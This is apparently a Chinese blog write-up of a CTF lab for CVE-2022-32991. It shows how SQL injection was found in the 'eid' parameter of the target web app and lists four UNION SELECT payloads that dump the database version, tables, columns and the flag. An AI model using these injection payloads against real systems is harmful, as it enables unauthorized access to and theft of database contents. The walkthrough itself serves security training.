首页 > 其他分享 >春秋云境CVE-2022-32991

春秋云境CVE-2022-32991

时间:2024-01-26 10:22:26浏览次数:37  
标签:group 23 union 云境 eid 2022 CVE 5b141b8009cf0 select

进来后看到如下页面,先试试能不能注册

点击register,成功注册

 

登录后,发现url有?q=1,尝试闭合,没发现注入点

 

打开burp抓包,发现有挺多get参数,一个一个尝试

 

试到eid的时候,发现存在字符注入点,而且有回显,可以用union联合查询,确定有5列

 

eid=5b141b8009cf0'+union+select+1,2,group_concat(database(),version()),4,5%23
eid=5b141b8009cf0'+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()%23
eid=5b141b8009cf0'+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name='flag'%23
eid=5b141b8009cf0'+union+select+1,2,group_concat(flag),4,5+from+flag%23

最后爆出flag

标签:group,23,union,云境,eid,2022,CVE,5b141b8009cf0,select
From: https://www.cnblogs.com/dg05/p/17785835.html

相关文章

  • Redis整形溢出漏洞(CVE-2021-32761)及修复脚本
    今天的计划是修复线上的redis漏洞Redis整形溢出漏洞(CVE-2021-32761)及修复脚本目的:修复生产的redis漏洞,主要是整数溢出漏洞,但是过程中发现还有反弹shell漏洞(次要,毕竟需要密码)计划:获取生产的redis版本账号和密码在测试环境搭建反正环境漏洞的研究与证实测试环......
  • 和鲸CEO范向伟入选2022年上海市东方英才计划创业项目领军创业人才
    1月17日下午,徐家汇环交大人工智能科创街区建设推进会在中银慧谷举行。本次活动由徐家汇街道党工委、办事处,徐汇区科学技术委员会和上海交大科技园有限公司共同主办,旨在进一步加强科技创新对区域高质量发展的支撑引领作用,围绕环交大特色产业内核,全面推进徐家汇环交大人工智能科创街......
  • 更新VS2022新版本后,高概率弹出“为防止...时出现不安全的中止,已允许所有线程进行。这
    目前我的VS版本是17.8.5:印象中上一个小版本的时候就已经出现这个问题了。自己的应用,点击调试的时候,高概率出现下面的对话框:但又不是每次都会出现。程序没有设置任何的断点。多个程序都会出现。目前不知道啥原因引起。......
  • [NOIP2022] 种花
    题目描述小C决定在他的花园里种出\(\texttt{CCF}\)字样的图案,因此他想知道\(\textttC\)和\(\textttF\)两个字母各自有多少种种花的方案;不幸的是,花园中有一些土坑,这些位置无法种花,因此他希望你能帮助他解决这个问题。花园可以看作有\(n\timesm\)个位置的网格图,从上......
  • 【CVE-2022-42889】Apache Commons Text RCE
    介绍  组件介绍ApacheCommonsText组件通常在开发过程中用于占位符和动态获取属性的字符串编辑工具包,Demo举例:importorg.apache.commons.text.StringSubstitutor;classDemo{publicstaticvoidmain(String[]args){StringresolvedString=Str......
  • 【专题】中国中小企业数字化转型研究报告(2022)PDF合集分享(附原数据表)
    原文链接:https://tecdat.cn/?p=33471数字化转型指数报告2022合集根据“基础设施-平台-应用”三层指标体系,对全国300余个城市、10余个行业的数字化发展规模进行了评估。该报告提供了覆盖全国范围的季度数字化转型指数,为各行各业推进数字化转型提供了有益的参考。报告的评估结果可以......
  • CVE-2018-19518复现练习
    概述漏洞概述:imap_open函数在传递邮箱名给ssh之前没有正确过滤接收的参数,导致攻击者可以利用-oProxyCommand参数向IMAP服务器发起命令执行恶意代码影响版本:Ubuntu、Debian、RedHat、SUSE环境搭建cd/CVE-2018-19518docker-composeup-d查看网站的组件直接看页面也没有什么......
  • C# TEKLA STRUCTURES 2022 二次开发 开发环境搭建
    初步接触二次TEKLA,以下仅为个人观点使用的exe方式开发的引用的nuget包程序入口点稍作处理,开启了TEKLA软件才能启动本程序,TEKLA软件关闭,本程序退出internalstaticclassProgram{///<summary>///应用程序的主入口点。///</summary>......
  • CSP2022 & NOIP2022
    before\(\text{inf}\)days据说今年GD参赛的人数特别多,很慌。8.01按照往年的惯例,又是一年集训时。去年没学好,只好重头开始。今年这一届的队友tql。算是基本上把深进给复习了一遍吧。8.22集训终于结束了。烦人的初赛又来了。CSP模拟套题接连不断。平均分\(70\)左......
  • Windows Server 2022 中文版、英文版下载 (updated Jan 2024)
    WindowsServer2022中文版、英文版下载(updatedJan2024)WindowsServer2022正式版,2024年1月更新请访问原文链接:https://sysin.org/blog/windows-server-2022/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org此次发布更新了什么?答:版本号,当然还有……2021.09......